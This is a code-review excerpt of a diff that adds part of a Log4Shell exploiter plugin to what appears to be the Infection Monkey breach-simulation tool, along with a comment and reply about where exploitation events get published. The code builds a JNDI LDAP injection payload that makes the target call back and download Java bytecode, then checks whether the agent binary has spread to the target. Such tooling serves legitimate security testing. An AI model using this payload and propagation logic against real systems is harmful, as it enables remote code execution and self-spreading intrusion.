monkey/agent_plugins/exploiters/log4shell/src/log4shell_exploit_client.py

```diff
@@ -0,0 +1,218 @@
+            exploitation_message = str(err)
+
+        self._publish_exploitation_event(
+            target_host, success=exploitation_success, error_message=exploitation_message
+        )
+
+        return exploitation_success, propagation_success
+
+    def _run_exploit(
+        self,
+        target_host: TargetHost,
+        command: str,
+        options: Log4ShellOptions,
+        ldap_port: NetworkPort,
+        agent_binary_downloaded: Event,
+        exploit_class_downloaded: Event,
+        ports_to_try: Set[NetworkPort],
+        interrupt: Event,
+    ) -> Tuple[bool, bool]:
+        exploitation_success = False
+        propagation_success = False
+
+        for service_exploit in get_log4shell_service_exploiters():
+            for port in interruptible_iter(ports_to_try, interrupt):
+                logger.debug(
+                    f'Attempting Log4Shell exploit for service "{service_exploit.service_name}"'
+                    f"on port {port}"
+                )
+                try:
+                    timestamp = time()
+                    service_exploit.trigger_exploit(
+                        Log4ShellExploitClient._build_ldap_payload(target_host, ldap_port),
+                        target_host,
+                        port,
+                    )
+                    exploitation_success, propagation_success = self._propagate(
+                        target_host,
+                        timestamp,
+                        options,
+                        agent_binary_downloaded,
+                        exploit_class_downloaded,
+                    )
+                except Exception as err:
+                    error_message = (
+                        "An error occurred while attempting to exploit Log4Shell on a "
+                        f"potential {service_exploit.service_name} service: {err}"
+                    )
+                    logger.warning(error_message)
+                    self._publish_exploitation_event(
+                        target_host, timestamp, False, error_message=error_message
+                    )
+
+        return exploitation_success, propagation_success
+
+    @staticmethod
+    def _build_ldap_payload(target_host: TargetHost, ldap_port: NetworkPort) -> str:
+        interface_ip = get_interface_to_target(str(target_host.ip))
+        return f"${{jndi:ldap://{interface_ip}:{ldap_port}/dn=Exploit}}"
+
+    def _propagate(
+        self,
+        target_host: TargetHost,
+        timestamp: float,
+        options: Log4ShellOptions,
+        agent_binary_downloaded: Event,
+        exploit_class_downloaded: Event,
+    ) -> Tuple[bool, bool]:
+        victim_called_back = Log4ShellExploitClient._wait_for_victim_to_download_java_bytecode(
+            options.exploit_download_timeout, exploit_class_downloaded
+        )
+        victim_downloaded_agent = False
+        if victim_called_back:
+            self._publish_exploitation_event(target_host, timestamp, True)
```

Comment:
We shouldn't be publishing an exploitation event in a function that's meant for propagation.

Reply:
Move the exploitation event logic out of here and into `_run_exploit()`, before this function is called.